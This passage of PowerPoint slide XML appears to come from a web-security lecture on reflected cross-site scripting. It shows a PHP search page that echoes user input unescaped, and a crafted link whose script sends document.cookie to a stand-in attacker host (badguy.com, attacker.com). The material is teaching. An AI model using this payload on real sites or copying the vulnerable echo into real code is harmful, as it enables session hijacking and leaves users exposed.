          <a:xfrm>
            <a:off x="2209800" y="26066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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="37052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12307" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12308" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12309" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305050" cy="400050"/>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12310" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="30480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12311" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="40068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XSS example: vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search field on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="4876800"/>
            <a:ext cx="4876800" cy="1998663"/>
            <a:chOff x="3505200" y="4495800"/>
            <a:chExt cx="4876800" cy="1998031"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13317" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="4495800"/>
              <a:ext cx="4419600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13318" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580993" y="5155324"/>
              <a:ext cx="1387366" cy="614855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 614855"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1387366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:no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13319" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6156391" y="5785945"/>
              <a:ext cx="2225609" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>echo search term </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>into response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609600" y="76200"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bad input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295363" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138350" y="1143000"/>
            <a:ext cx="8700850" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider link:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(properly URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ? term =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badguy.com?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> )  &lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>What if user clicks on this link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser goes to    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser executes script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>badguy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   cookie  for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49"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536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536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536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536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536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53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
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2247900"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800"/>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15381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000" cy="1962150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
